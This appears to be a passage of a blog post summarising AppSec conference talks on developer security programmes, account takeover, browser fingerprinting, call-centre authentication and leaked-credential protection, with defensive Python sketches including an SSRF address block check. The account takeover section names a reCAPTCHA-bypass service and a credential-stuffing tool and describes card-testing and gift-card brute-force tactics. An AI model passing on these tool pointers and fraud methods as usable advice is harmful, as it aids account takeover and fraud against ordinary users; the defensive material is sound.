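To make the core idea concrete, here is a minimal sketch of the kind of check an SSRF-blocking proxy performs. This is not Segment's implementation: the function names `is_internal_ip` and `choose_connect_ip` are made up for illustration, and the exact set of address ranges to refuse is an assumption you should adapt to your own network. It uses only Python's standard `ipaddress` module.

```python
import ipaddress


def is_internal_ip(ip_text):
    """Return True if an outbound request to this address should be refused."""
    ip = ipaddress.ip_address(ip_text)
    return (
        ip.is_private          # e.g. 10.0.0.0/8, 192.168.0.0/16
        or ip.is_loopback      # 127.0.0.0/8, ::1
        or ip.is_link_local    # 169.254.0.0/16, including cloud metadata endpoints
        or ip.is_multicast
        or ip.is_reserved
        or ip.is_unspecified
    )


def choose_connect_ip(resolved_ips):
    """Return one address to connect to, or raise if any resolved address is internal."""
    if not resolved_ips:
        raise ValueError("hostname did not resolve to any address")
    for ip_text in resolved_ips:
        if is_internal_ip(ip_text):
            raise ValueError(f"refusing to connect to internal address {ip_text}")
    return resolved_ips[0]


print(choose_connect_ip(["8.8.8.8"]))
print(is_internal_ip("169.254.169.254"))
```

The DNS rebinding angle is why the second function returns an address: the caller should connect to the exact IP that was validated instead of resolving the hostname again, since a second lookup could return a different (internal) answer.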

Working with Devs: Coding Guidelines
One of the Segment devs created a web app where you can enter a few keywords and it’ll bring up information from the relevant secure coding guideline

Benefits of AppSec Training

  • The security team gets to meet new engineers early in their time at Segment and start building a positive relationship
  • Devs are introduced to common vuln types
  • “Security Judgment” - give devs a feel for when they should ask for help or do more research when building a feature
  • Teach devs to apply a security mindset when reviewing PRs
  • Have fun during onboarding!
Working with Devs: Hackerman
Devs get "I Hacked" and "Hackerman" stickers after they complete the training

Vendor Adoption

How do you buy security tooling for devs and have them actually use it?

The Segment security team doesn’t actually buy many tools for their own uses, it’s more often for devs. The security team partners with engineering during the evaluation process to make sure the tooling is easy to use and meets devs’ needs.

Example - Snyk

Leif walks through how Segment adopted Snyk, a tool to help companies manage vulnerabilities in their dependencies. The process had the following steps:

Security Evaluation
First, the security team tested Snyk on various repos, ensuring it had the required features (e.g. language support).

Partner with Engineering
They partnered early in the process with engineering, as devs are the ones who are going to have to use the tool, not security. They did not buy it without seeing if the tool would work for devs.

Presented at Engineering All-Hands
They made it fun by having people write down on a piece of paper how many total dependencies they thought Segment had across all projects and had a Price is Right-style competition in which the winner got a crown.

Initial Roll-out by Security
The security team submitted PRs integrating Snyk to Segment’s core repos. Devs could then add Snyk to other repos based on these examples.

The security team also added Snyk to the Segment starter templates for new Go repos, so any new Go repos created using the standard development process will use Snyk without the dev having to do anything.

Hitch Security to the Developer Productivity Bandwagon
Integrating security controls and tooling into standard dev tooling is one of the most effective ways to get broad adoption of the things you build as a security team. I’ve seen this time and time again at various companies. This also forces you to keep dev UX in mind, as you probably won’t be allowed to introduce a tool or process with too much friction into standard dev workflows.

See Lessons Learned from the DevSecOps Trenches and Netflix’s Layered Approach to Reducing Risk of Credential Compromise for more examples and thoughts on this.

Working with Devs: Directory
The security team also wrote a Snyk integration with Directory, an internal tool Segment uses to display various useful meta info about services

Some people on Twitter talk about the “security basics,” and I don’t think that’s a good name for it because “security basics” are actually really hard.

“Fundamentals” is a better name. Shooting in basketball is a “fundamental,” yet it takes years and years to get as good as Steph Curry.

Bug Bounty

Pay for anything that gives value. If there’s a duplicate that still gives you value, pay that person for it.

There’s a lot of work that goes into assessing a new target, reading the program scope, understanding the product, etc. If you can build a relationship with security researchers who are going to provide you value in the future, a few hundred dollars is a small cost to your org.

We’ve gotten all of our most critical findings from researchers we previously paid for dupes or something early.

If you’re thinking about money on a per bug basis, you’re probably thinking about bug bounty in the wrong way.

What other tool do you judge based on how much each individual instance provides value? You should be thinking about the bug bounty program as a whole based on how much you’re spending vs other security tools.

Bug Report → Jira

You want to make bugs easy for devs to fix, so you need a good description, easy to follow reproduction steps, severity, remediation criteria, and a suggested remediation.

If your write-up doesn’t describe the impact in terms devs can understand without help, they’re probably not going to resolve it with the same urgency as you would.

Security ➡ Engineering Embed Program

Segment has found a lot of value in embedding security engineers in engineering teams for a quarter or so. These security engineers follow all the normal software design processes that devs do: writing software design docs, getting buy-in for the feature, working with the design team, writing good test cases, and following deployment procedures.

Ideally the security engineer sits with the dev team, goes through their onboarding process, and is basically just part of their team.

The process is a great way to build empathy for devs. Maybe you’ll find the security review process sucks and you can make it more usable.

Benefits: By walking a mile in a developer’s shoes, you will:

  • Make valuable connections- you’ll meet devs, designers, product managers, and other people you wouldn’t normally meet.
  • Develop a deeper understanding of the engineering process, including their tooling and constraints.
  • Build rapport with engineering, as you demonstrate that you can build useful features and tools.
  • Learn more about the code base you’re protecting.

You can then bring these insights and lessons learned back to the security team, helping the team be more effective over time.

Developer Friendly SAST

Leif recommends checking out the LASCON talk by the Datadog security team Orchestrating Security Tools with AWS Step Functions, the Absolute AppSec podcast #33 with John Melton on linting and other lightweight security checks, and Coinbase’s Salus tool.

Check out my 2019 ShellCon talk Rolling Your Own: How to Write Custom, Lightweight Static Analysis Tools for how to use open source tools to create custom checks for interesting code patterns, for example, to detect bugs or anti-patterns.

In Case of Emergency

Ideally you never have to use these, but if you really need to get something fixed:

  • Compliance requirements (GDPR, ISO27001, etc.)
  • Recent pen tests (shown to customers)
  • Customer security questionnaires
  • “My peers at companies x, y, and z do thing



Account Security

Automated Account Takeover: The Rise of Single Request Attacks

Kevin Gosschalk, Founder and CEO, Arkose Labs
abstract slides video

In this talk, Kevin defines “single request attacks,” describes challenges of preventing account takeovers, gives examples of the types of systems bots attack in the wild and how, and offers recommendations for preventing account takeovers.

Kevin spends the first 6 minutes of this 49 minute talk (~12%) discussing his past work on eye imaging software to detect diabetes earlier and working with Microsoft on Kinect motion sensor-type technology. He starts talking about account takeovers at 6:16.

Kevin defines account takeover (ATO) to be “using another person’s account information to obtain products and services using that person’s existing accounts.”

Attackers can use compromised accounts to do things like redirect packages (if they’ve compromised a UPS or Fedex account) which they can then sell, scrape private or sensitive content that the victim account has access to, or most commonly, make transactions for their financial benefit.

As the security of most IoT devices is poor (being generous), attackers have been hacking IoT devices that have blatant security flaws or just default passwords, and then routing their brute force login attempts through the devices so the guesses come from a wide range of IPs.

Challenges to Preventing Account Takeovers

  • Attackers can use a unique IP for every request, making IP-only solutions ineffective.
  • Attackers use a unique identity (e.g. user agent, installed fonts, other fingerprintable aspects) for every request
  • Browsers are easy to automate (e.g. headless Chrome, Selenium, PhantomJS), making it hard to differentiate bot clients from real users.
  • reCAPTCHA is easy to bypass using modern machine learning techniques. Check out the Russian software XEvil Solver if you need to bypass reCAPTCHA at scale.

There are a number of tools, such as AntiPublic, which for an affordable price, will automate much of the account takeover process for you. You provide a set of email addresses, passwords, and websites you’d like to target, and it’ll give you helpful stats like success rates, which accounts worked, etc. Some of the tools even include a free trial! Such customer service 👍

Bot Attacks in the Wild

Airlines: One airline had all of its seats “sold out” for two weeks into the future, so potential customers couldn’t buy them. Bots would select a seat and continue to payment, where the site redirects to a third-party, such as Alipay or PayPal. However, the bot doesn’t complete the transaction, it just holds the reservation, preventing anyone else from buying it until the transaction times out. Rinse and repeat.

Concerts: Most concert tickets are sold out in 3 minutes now because of bots. The scalpers then resell the tickets for a hefty profit.

Gift cards: When you buy a gift card, they scan it at the cash register, which then “activates” it. Bots can brute force the gift card’s unique number so an attacker can spend the value once the card is activated but before it’s used. Merry Christmas.

Credit cards: When hackers obtain stolen credit cards that they aren’t sure are working, sometimes they’ll test them by making $1 donations to various charities and see if it succeeds. Bonus: these charity sites tend to have few to no protections against bots and they sometimes give helpful feedback, like “Sorry, that’s the wrong CVV / address,” making determining the correct values much easier.

Clothes: Bots snatch up shoes and other apparel that are released in limited quantities and resell for a nice profit.

Pokemon Go: Hackers used a modified Android OS to bypass SafetyNet, which is an Android API developers can use to “assess the device’s integrity.” (good ol’ return true).

Dead voters: The Death Master File was leaked at one point, which is a government file that lists who has died, their date of birth, SSN, and last zip code where the person was alive. Hackers have used the list to create accounts on various sites where “real people” are needed, like voting in certain polls, for example, commenting against net neutrality.

Auction abuse: Rivals bid up competitors’ products and then bail out of paying at the last minute, so their items are purchased instead.

How do we stop account takeovers?

In the last four minutes, Kevin shares a few thoughts on stopping account takeovers.

  1. Rate limit by email and identity - give users 3 attempts via an IP or identity
  2. Lock accounts with suspicious activity
    • Email the account owner when an incorrect password is entered or multiple attempts have been made. Note that this can be a bad user experience, leading you to lose customers.
  3. Use MFA
  4. Require (and enforce) strict passwords, and test them against the HaveIBeenPwned API.
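
For the last item, here is a minimal sketch of checking a candidate password against the Pwned Passwords range endpoint, which uses k-anonymity: only the first 5 hex characters of the password's SHA-1 hash leave your server, and the response lists matching hash suffixes with counts. The helper names are made up for illustration, and `fake_fetch` (with its made-up counts) stands in for a real HTTP GET to `https://api.pwnedpasswords.com/range/<prefix>` so the example runs offline.

```python
import hashlib


def split_sha1(password):
    """Return (5-char prefix, 35-char suffix) of the uppercase SHA-1 hex digest."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def breach_count(password, fetch_range):
    """Return how many times password appears in the breach data (0 if absent).

    fetch_range(prefix) must return the response body for that prefix:
    one "SUFFIX:COUNT" entry per line.
    """
    prefix, suffix = split_sha1(password)
    for line in fetch_range(prefix).splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate.upper() == suffix:
            return int(count)
    return 0


def fake_fetch(prefix):
    # Hypothetical stand-in for the HTTP call; the counts are invented.
    _, suffix = split_sha1("password")
    return "0018A45C4D1DEF81644B54AB7F969B88D65:3\r\n" + suffix + ":42\r\n"


print(breach_count("password", fake_fetch))
print(breach_count("correct horse battery staple", fake_fetch))
```

A signup or password-change handler could reject (or warn on) any password whose count is above zero.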

How do we make it more expensive for the attackers than the value they’d get out of committing fraud? If we can break the economics of it, they’ll attack someone else.

Browser fingerprints for a more secure web

Julien Sobrier, Lead Security Product Owner, Salesforce
Ping Yan, Research Scientist, Salesforce
abstract slides video

This talk describes how Salesforce uses browser fingerprinting to protect users from having their accounts compromised. Their goal is to detect sessions being stolen, including by malware running on the same device as the victim (which thus has the same IP address).

They’re interested in detecting two types of cases:

  1. Per user - significant changes in the fingerprint of one user (targeted attack)
  2. Across users - many users now have the same fingerprint (e.g. many users infected by the same malware)

They use 19 fingerprint vectors, which are largely standard features used by prior work like Panopticlick and Browser Leaks:

  • User agent
  • Screen resolution and window size (height and width)
  • Pixel density, color depth
  • Time zone and language
  • Plugins and fonts installed
  • navigator.platform
  • canvas and media devices
  • If session storage, local storage, web sockets, and IndexedDB are supported
  • Codecs and DRM, if DNT is enabled

They needed to determine how much and how often a user’s fingerprint changes: if fingerprints were highly variable, their system might report many false positives, leading to a bad user experience. If fingerprints tend not to be very unique, then they may not be effective at detecting compromised user sessions.

Browser Fingerprint Uniqueness
Consistency across sessions for a given user is pretty high (77% no change), and 78% of fingerprints are unique to one user. Thus, this approach is promising.

To measure how much a user’s fingerprint changes over time, they use Shannon entropy. A high entropy value indicates that the user’s fingerprint can be quite variable, while low entropy means it stays consistent.
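
As a rough illustration of the entropy measure, here is a minimal sketch that computes Shannon entropy (in bits) over the fingerprints observed for one user. How Salesforce actually encodes fingerprints and computes the score isn't specified in the talk summary, so this assumes each observed fingerprint has been reduced to an opaque string (for example, a hash) and the sample histories are invented.

```python
import math
from collections import Counter


def shannon_entropy(observations):
    """Shannon entropy in bits of the empirical distribution of observations."""
    total = len(observations)
    if total == 0:
        return 0.0
    counts = Counter(observations)
    # H = sum over distinct values of p * log2(1 / p)
    return sum((n / total) * math.log2(total / n) for n in counts.values())


stable_user = ["fp_a", "fp_a", "fp_a", "fp_a"]      # same fingerprint every session
variable_user = ["fp_a", "fp_a", "fp_b", "fp_c"]    # fingerprint changes often

print(shannon_entropy(stable_user))
print(shannon_entropy(variable_user))
```

A user who always shows the same fingerprint scores 0 bits, so any change for them is notable; a user whose fingerprint shifts often scores higher, so a single change is less surprising.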

Browser Fingerprinting Methodology
This is the approach from end to end - fingerprint data is collected client side from user browsers via JavaScript and sent to Salesforce servers. After a training period (say 2 weeks), each user is given an entropy score based on how much their fingerprint changes over time. Then when a user is observed with a new fingerprint, they do ‘fingerprint diffing’, which weights how likely the user’s session is to change as well as the magnitude of the change. For example, having a totally different IP address vs a different one on the same subnet.
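
To give a feel for what ‘fingerprint diffing’ could look like, here is a deliberately simplified sketch. The scoring formula, the attribute weights, and the function name `fingerprint_diff_score` are all assumptions made for illustration, not Salesforce's method: it sums a per-attribute weight for every attribute that changed (the magnitude) and discounts the result for users whose fingerprints have historically been variable (their entropy score).

```python
# Hypothetical weights: how alarming a change in each attribute is.
ATTRIBUTE_WEIGHTS = {
    "user_agent": 1.0,   # changes on every browser update
    "time_zone": 2.0,
    "platform": 3.0,     # a new OS is a bigger jump
}


def fingerprint_diff_score(previous, current, user_entropy, weights=ATTRIBUTE_WEIGHTS):
    """Return (score, changed_attributes) for a newly observed fingerprint.

    The score is the summed weight of changed attributes, divided by
    (1 + user_entropy) so that historically variable users score lower.
    """
    changed = [name for name in weights if previous.get(name) != current.get(name)]
    magnitude = sum(weights[name] for name in changed)
    return magnitude / (1.0 + user_entropy), changed


old = {"user_agent": "UA-1", "time_zone": "UTC-8", "platform": "MacIntel"}
new = {"user_agent": "UA-1", "time_zone": "UTC-8", "platform": "Win32"}

print(fingerprint_diff_score(old, new, user_entropy=0.0))
print(fingerprint_diff_score(old, new, user_entropy=1.0))
```

Sessions whose score crosses some threshold would then be queued for review; picking that threshold is the tuning work that determines the false positive rate.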

Out of the hundreds of millions of user sessions Salesforce sees per day, the system flags around 20-30 suspicious ones that are passed on to the SOC team to investigate. Of these, roughly half are truly compromised accounts.

One thing the system doesn’t yet effectively handle is users who consistently use more than one device, but that may be addressed in future work.

Contact Center Authentication

Kelley Robinson, Dev Advocate, Account Security, Twilio
abstract slides video

Kelley describes her experiences calling in to 30 different companies’ call centers: what info they requested to authenticate her, what they did well, what they did poorly, and recommendations for designing more secure call center authentication protocols.

Research parameters

Kelley chose companies for which she had an existing account with at least some personal info tied to it (e.g. orders, her address) that had an available USA customer support phone number that accepted inbound calls.

She mostly tested information gathering (read), but did some limited actions and account changes (write). In several cases, attempting to change attributes of an account triggered additional security checks.

Kelley ended up contacting 30 companies, including United, Netflix, Apple, Hyatt, conEdison, Lemonade, Walmart, Chase, Mattress Firm, and Comcast.

Background

Getting in touch with companies over the phone can generally be grouped into the following categories:

  1. They provide a customer support number (e.g. Home Depot, Comcast, State Farm)
  2. They have a “Call me” feature (e.g. Walmart, Amazon, Verizon)
  3. No phone number provided (e.g. Facebook, Lyft)

Kelley focused on the first category in this research.

While most companies provided an Interactive Voice Response (IVR) system that lets you specify what you’re aiming to do via voice and/or keypad presses, the path you select rarely matters if you end up talking to a human agent.

Companies tend to do identification in one of the following ways:

  1. Automated with the phone number you’re calling from (caller ID), if your account is tied to your phone number.
  2. Automated with a company-specific number you provide, like an account number, insurance ID, credit card number, etc.
  3. Manual with an agent, which is what this talk focuses on.

Identifying you is not the same as authenticating you!

Establishing identity can be done with personal information, such as your date of birth, but this information tends to be static and searchable online. Many people could find out this information.

Authenticating is proving that you are actually the person you claim to be, usually via a secret, such as a one time code sent to your phone.

Results

At a high level, some companies did very well, while others don’t vet you very strictly. For example, some just ask for your name and date of birth, which can be easily found.

Contact Center Authentication - Results Chart
The identification methods used by the companies Kelley contacted. Note that the most popular types on the left are more related to ‘identity’ than ‘authentication’, in that they’re static and/or semi-public. Overall, not the type and rigor of attributes we’d like to see from companies.

Kelley noted that one shipping company asked for her password, so they could log in as her in their system 😅.

Kelley had just moved when she was doing this research, so sometimes she’d ask services for the address on her account to ensure it had been updated. Some wouldn’t provide this info, but some would. This is a problem because some services use your address to identify you, so when a company gives this info out they’re making your other accounts more vulnerable to account takeovers, and potentially putting you at personal risk.

Moar stats plz
I liked the content, structure, and the fun presentation style of this talk. If I could provide one piece of feedback, it would be that I would have loved to see more stats on what Kelley observed across all of these companies.

Here we see the types of identity info companies asked for, but what combinations of identity info did companies tend to ask for? How many companies asked for one vs more than one form of ID? How many companies leaked aspects of your account info, and what info? How many companies allowed state changing account actions with what level of identity/authentication? How many companies required additional info for state changing actions, and what info did they ask for? Did any of these vary by company vertical, and what were the trends?

The Good: Actually Authenticating Users

Some services did really well, providing users one time codes for authentication and refusing to disclose personal information.

Contact Center Authentication - Netflix
Once you’re logged in, Netflix has this Service Code button that provides you a 6 digit code that you can then provide to a service rep to authenticate you.
Contact Center Authentication - Stripe
Stripe provides an easy built-in way to authenticate yourself to Stripe, and vice versa. I think this is awesome, and not something I see commonly from companies.
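
The service code pattern described above can be sketched in a few lines. This is not Netflix's or Stripe's implementation: the class name `ServiceCodes`, the 5 minute lifetime, and the in-memory dictionary are assumptions made for illustration. The idea is that a logged-in user requests a short-lived code on the website, reads it to the agent, and the agent's tooling verifies it exactly once.

```python
import hmac
import secrets
import time

CODE_TTL_SECONDS = 300  # assumed lifetime; pick what fits your support flow


class ServiceCodes:
    """In-memory store of one-time codes keyed by account ID (sketch only)."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._codes = {}

    def issue(self, account_id):
        """Create a fresh 6-digit code for a logged-in user to read to an agent."""
        code = f"{secrets.randbelow(10**6):06d}"
        self._codes[account_id] = (code, self._clock() + CODE_TTL_SECONDS)
        return code

    def verify(self, account_id, spoken_code):
        """Return True for the right, unexpired code; any attempt consumes the code."""
        code, expires_at = self._codes.pop(account_id, (None, 0.0))
        if code is None or self._clock() > expires_at:
            return False
        # Constant-time comparison avoids leaking how many digits matched.
        return hmac.compare_digest(code.encode(), spoken_code.encode())


codes = ServiceCodes()
code = codes.issue("account-123")
print(codes.verify("account-123", code))
print(codes.verify("account-123", code))
```

Because the code is only obtainable after logging in, it inherits whatever protections (password, 2FA) the website already enforces, which is what makes it authentication rather than identification.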

The OK

Most companies were here - room for improvement but overall positive, doing things like:

  • Recognizing the phone number you’re calling from.
  • Verifying multiple forms of personal information.
    • If you’re not going to do true authentication, at least require the caller to have multiple forms of information.
  • Prompting with relevant account actions.

For example, the automated intro when calling in to United:

Welcome back, Kelley. I see you’re flying from LA to Newark Liberty today, are you calling about that trip?

Of course, there’s some risk here about revealing info about her travel plans, but that is ephemeral. There were some utility providers that when she’d call would prompt with, “Hi Kelley, are you calling about your account at 123 Main Street Apartment 3?”

Recommendation: Prompt users with relevant account actions they can take, but try not to give away too much info about them.

The Bad

The process followed by these companies would allow successful phishing with minimal effort:

  • Only asking for one form of identity, for example, looking up your account by phone or email and asking no additional questions.
  • Identifying callers via easily accessible public information (e.g. phone number, email address, date of birth).
  • Requiring a Social Security Number.
    • This is not an authenticator! Many companies treat this as a secret but it’s not. SSNs have been leaked in many breaches, and they were issued serially prior to June 25, 2011.

The… oh… oh no

  • Giving out identity information. This was more common than she would like.
  • Allowing account changes without authentication.
  • Asking what phone number or email address to send an authentication token to 😆.

Recommendations

Alright, so what can we do to build more secure contact center authentication protocols?

Unify Authentication Systems

Use the same rigor for authentication over the phone as you do on your website, and honor user settings for things like 2FA.

Build Guardrails for Agents

Agents want to be helpful, and most don’t have anti-phishing training. We can design the systems and processes they use such that they can’t accidentally give out too much information about a user’s account.

  • Limit caller information available to agents.
    • If a user isn’t asking about address info, then don’t show it to the agent.
  • Only expose information after a caller is authenticated.
    • Thus a user’s info can’t be leaked until we’ve proven it’s them.
  • Have a small subset of agents that have access to do the most sensitive actions, who have undergone social engineering training, who are passed along the potentially dangerous calls.
  • Do a risk assessment using provided identity.
    • You can do things behind the scenes to detect fraud that’s transparent to the user. For example, there are services that can provide reputation/fraud info related to specific phone numbers or email addresses.
Contact Center Authentication - Guardrails
Provide guardrails for agents so that they can’t accidentally share info they shouldn’t.
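The first two guardrails (limit what agents see, and only expose it after authentication) can be sketched in a few lines. This is a minimal illustration, not how any company in the talk implements it: the topic names, field names, and `agent_view` function are all hypothetical.

```python
from typing import Dict, Set

# Hypothetical mapping from the reason for the call to the account fields
# an agent actually needs to see to help with it.
FIELDS_BY_TOPIC: Dict[str, Set[str]] = {
    "billing": {"plan", "last_invoice_amount"},
    "shipping": {"mailing_address"},
}


def agent_view(account: Dict[str, str], topic: str, caller_authenticated: bool) -> Dict[str, str]:
    """Return only the account fields the agent may see for this call."""
    # Nothing is exposed until the caller has been authenticated.
    if not caller_authenticated:
        return {}
    # Unknown topics expose nothing rather than everything.
    allowed = FIELDS_BY_TOPIC.get(topic, set())
    return {field: value for field, value in account.items() if field in allowed}


account = {
    "plan": "premium",
    "last_invoice_amount": "42.00",
    "mailing_address": "123 Main Street Apartment 3",
}
print(agent_view(account, "billing", caller_authenticated=True))
print(agent_view(account, "billing", caller_authenticated=False))
```

The point of the design is that the agent never has the address on screen during a billing call, so they can't be talked into reading it out.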

Of course, there are trade-offs in building these guardrails - it can be a worse user experience, and it can make customer service calls longer, which increases cost.

Consider Your Threat Model

Reflect on what you are allowing people to do over the phone. If you can’t implement true authentication, limit the sensitive actions that can be taken, and instead direct users to your website.

Leveraging Users’ Engagement to Improve Account Security

Amine Kamel, Head of Security, Pinterest
abstract video

Amine describes how Pinterest protects users who have had their credentials leaked in third-party breaches using a combination of programmatic and user-driven actions. He refers to these users as “high risk users” (HRU).

Balancing Security and User Experience
One thing I liked about this talk is how Amine described the various protection mechanisms they could implement and how Pinterest weighed the security ROI vs the impact on user experience.

It’s easy, as a security professional, to say, “Let’s do this, because it has the best security properties,” when in the real world, we need to be balancing security with the needs of our business and the experience of our users. A perfectly secure business with no users won’t be a business much longer.

Leveraging User Engagement: Approach Architecture
Pinterest’s solution has the following 4 steps:
  1. Record Ingestion: Ingest third-party data breach info
  2. Account Matching: Determine email/password combinations that match Pinterest users
  3. Account Tagging: Tag accounts as high risk once credentials have been verified to be in use
  4. Account Protection: Protect accounts to prevent account takeovers

1. Records Ingestion

There are a number of sources you can use:

  • Vendors: Reliable, provide info in an organized, easily parseable format, but can be pricey. (e.g. HoldSecurity, Qintel, Shape)
  • Public Dumps: Tend to be unreliable, disorganized, and have duplicates. Thus, they require more work to get value from, as you need to verify and clean up the data. (e.g. pastebin.com)
  • Threat Intel Platforms: These tend to be more for malware analysis, spam, etc., but can be useful here. (e.g. Threat Exchange, AlienVault OTX)
  • Random Sources: Other publicly available, reporters, underground forums, dark web services and markets.

2. Account Matching

  1. Dump your whole list of users
    • Somewhere safe, like in a strictly secured S3 bucket that can only be accessed by your matching service.
    • You can do this at whatever frequency makes sense for your business, for example daily or weekly. Pinterest does it every 3 days.
    • Structure the user data like: user_id | email | bcrypted_password
  2. Combine accounts
    • Filter through the data you’ve ingested and look for emails that also belong to users within your system.
    • For each matched email address, recompute the bcrypt’d password and determine if it matches the value from your database. If so, add it to the list of “matched” accounts.
  3. Upload accounts - upload only the list of user_ids matched to an S3 bucket, delete the prior user account list dump.
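The matching step above can be sketched roughly as follows. This is my own illustration, not Pinterest's code: `UserRecord`, `match_accounts`, and the `stand_in_*` helpers are hypothetical names, and because bcrypt isn't in the Python standard library, PBKDF2 stands in for it here so the example runs as-is. With the `bcrypt` package installed, you'd pass a `verify` function built on `bcrypt.checkpw` instead.

```python
import hashlib
import hmac
from typing import Callable, Iterable, NamedTuple, Set, Tuple


class UserRecord(NamedTuple):
    # Mirrors the dump layout: user_id | email | bcrypted_password
    user_id: int
    email: str
    password_hash: str


def stand_in_hash(password: str, salt: str) -> str:
    """Stand-in for bcrypt (assumption): salted PBKDF2, stored as 'salt$hex'."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 10_000)
    return f"{salt}${digest.hex()}"


def stand_in_verify(password: str, stored_hash: str) -> bool:
    """Re-hash the candidate password with the stored salt and compare."""
    salt = stored_hash.split("$", 1)[0]
    return hmac.compare_digest(stand_in_hash(password, salt), stored_hash)


def match_accounts(
    users: Iterable[UserRecord],
    leaked: Iterable[Tuple[str, str]],
    verify: Callable[[str, str], bool] = stand_in_verify,
) -> Set[int]:
    """Return user_ids whose leaked email/password pair is currently in use."""
    by_email = {user.email.lower(): user for user in users}
    matched: Set[int] = set()
    for email, password in leaked:
        user = by_email.get(email.strip().lower())
        # Only hash when the email belongs to one of our users.
        if user is not None and verify(password, user.password_hash):
            matched.add(user.user_id)
    return matched


users = [
    UserRecord(1, "a@example.com", stand_in_hash("hunter2", "salt1")),
    UserRecord(2, "b@example.com", stand_in_hash("correct horse", "salt2")),
]
leaked = [("A@example.com", "hunter2"), ("b@example.com", "wrong-password")]
print(match_accounts(users, leaked))
```

Note that only the set of matched `user_id`s leaves this function, which lines up with step 3: the output that gets uploaded contains no emails or passwords.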

3. Account Tagging

This process can be challenging, as there are many large files to process and potentially many users per file to tag as being at high risk for account takeovers.

Pinterest’s solution is to have a nightly tagging job that distributes the work over multiple worker threads.

Interesting points:

  • High risk users are given a Unix timestamp field credentials_leaked_at, not just a boolean like has_leaked_creds, because timing matters.
  • They define an is_high_risk_user function that incorporates whether the user has changed their password since their creds leaked and whether they’ve turned on 2FA.
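Here's a minimal sketch of what such a function could look like. The field names `credentials_leaked_at` and the function name `is_high_risk_user` come from the talk; the `Account` class, the other fields, and the exact rules (2FA or a newer password clears the flag) are my assumptions about how the pieces fit together.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Account:
    # Unix timestamps; None means "never happened".
    credentials_leaked_at: Optional[int] = None
    password_changed_at: Optional[int] = None  # hypothetical field
    two_factor_enabled: bool = False           # hypothetical field


def is_high_risk_user(account: Account) -> bool:
    """True if leaked credentials may still be usable against this account."""
    if account.credentials_leaked_at is None:
        return False  # never seen in a breach
    if account.two_factor_enabled:
        return False  # assumed: 2FA mitigates a leaked password
    changed = account.password_changed_at
    if changed is not None and changed > account.credentials_leaked_at:
        return False  # password was rotated after the leak
    return True


print(is_high_risk_user(Account(credentials_leaked_at=1_546_300_800)))
```

This is also why a timestamp beats a boolean: without knowing when the creds leaked, you can't tell whether a later password change already fixed the problem.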

4. Account Protections

Pinterest uses two classes of account protections: programmatic, enforced automatically by Pinterest, and user engagement-based, which requires active steps taken by users.

Programmatic Protections

Again, the goal is to protect as many high risk users as possible while minimizing friction and providing a great user experience. This comes into play below when determining when and how to protect users.

To protect users they:

  • Immediately invalidate all active sessions (Have a session_valid_after field so that sessions that predate your protection are no longer valid)
  • Link users to the reset password / recover account flow.
  • Send the user an email letting them know what happened. They noticed that this is a good opportunity to encourage users to enable 2FA, as users who received this email tend to be more likely to do so.
Leveraging User Engagement: Reset Email
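The session_valid_after idea from the list above is simple enough to sketch. Only the field name comes from the talk; the `Session` class, the in-memory dict standing in for a user table, and both function names are hypothetical.

```python
from dataclasses import dataclass
from typing import Dict


@dataclass
class Session:
    user_id: int
    created_at: int  # Unix timestamp of when the session was issued


def protect_account(session_valid_after: Dict[int, int], user_id: int, now: int) -> None:
    """Invalidate every session issued before `now` without enumerating them."""
    session_valid_after[user_id] = now


def is_session_valid(session: Session, session_valid_after: Dict[int, int]) -> bool:
    """A session is valid only if it was created at or after the cutoff."""
    return session.created_at >= session_valid_after.get(session.user_id, 0)


cutoffs: Dict[int, int] = {}
old_session = Session(user_id=7, created_at=1_000)
protect_account(cutoffs, user_id=7, now=2_000)
new_session = Session(user_id=7, created_at=2_500)
print(is_session_valid(old_session, cutoffs), is_session_valid(new_session, cutoffs))
```

The nice property is that protecting an account is a single write, no matter how many devices the user (or an attacker) is logged in on.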

When should you protect users?

  • As soon as possible
  • Next time they log in (don’t affect active sessions)

Pinterest chooses the latter, protecting on next login, the intuition being that if an attacker gained access to a user’s credentials, they’d use them to log in, and thus create a new session. They don’t want to affect active sessions unless they have evidence that the account has been exploited.

Within protecting users as they log in, there are two options:

  • Aggressive approach: each time a high risk user is logging in, protect the account (impact growth)
  • Balanced approach: correlate with other signals to determine risk. Have we seen this device/browser before? What’s the reputation of the IP?

User Engagement-based Protections

Encourage the user to help secure their account, as we’re not sure if they’ve been exploited.

A benefit of this approach is that you don’t have to invalidate their session and log them out, which is a better overall user experience.

How to do this?

Leveraging User Engagement: Security Nags
Give users several options to go from an insecure state to a secure state.

As the user is setting a new password, you can enforce that they create a more secure password, in length and complexity as well as ensuring it doesn’t match known breached passwords.

A user can also choose to link their account to Facebook or Google instead. In that case, Pinterest disables password-based logins for that user.

Not Just High Risk Users
You can use this same security nag approach on other high value accounts, such as advertisers, businesses, celebrities, and creators.

Results

On average, they programmatically protect ~5,500 high risk users per day, or ~170,000 per month.

High risk users choose to secure their accounts by (daily average):

  • Changing their password: ~1,200 users
  • Using Google for login: ~1,000 users
  • Using Facebook for login: ~900 users

Pinterest has observed a 20% engagement rate with the security nag. That is, 1 out of 5 users who see it will go through the full flow of securing their account.

Nice! That’s much higher than I expected.

On average, user engagement adds ~3,100 high risk user protections per day, or ~96,000 per month.

Together, programmatic and engagement-based protect ~266,000 high risk users per month.



Blue Team

CISO Panel: Baking Security Into the SDLC

Richard Greenberg, Global Board of Directors, OWASP
Coleen Coolidge, Head of Security, Segment
Martin Mazor, Senior VP and CISO, Entertainment Partners
Bruce Phillips, SVP & CISO, Williston Financial
Shyama Rose, Chief Information Security Officer, Avant
abstract video

What were some of the biggest challenges you’ve encountered in baking security into the SDLC? Any tips?

Shyama
Works in the financial industry. The biggest challenges for her are the supplier due diligence and collusion problems. She’s received warnings from DHS before about supply chain security.

Bruce
Works at an insurance company. There’s always a tradeoff between security and usability. Businesses generally care about revenue and usability.

Martin
Thinks about the culture aspect. You can’t just have security people telling devs their baby is ugly. “DevOps is ultimately a cultural discussion, not a technical discussion.” This is ultimately a people problem.

Coleen
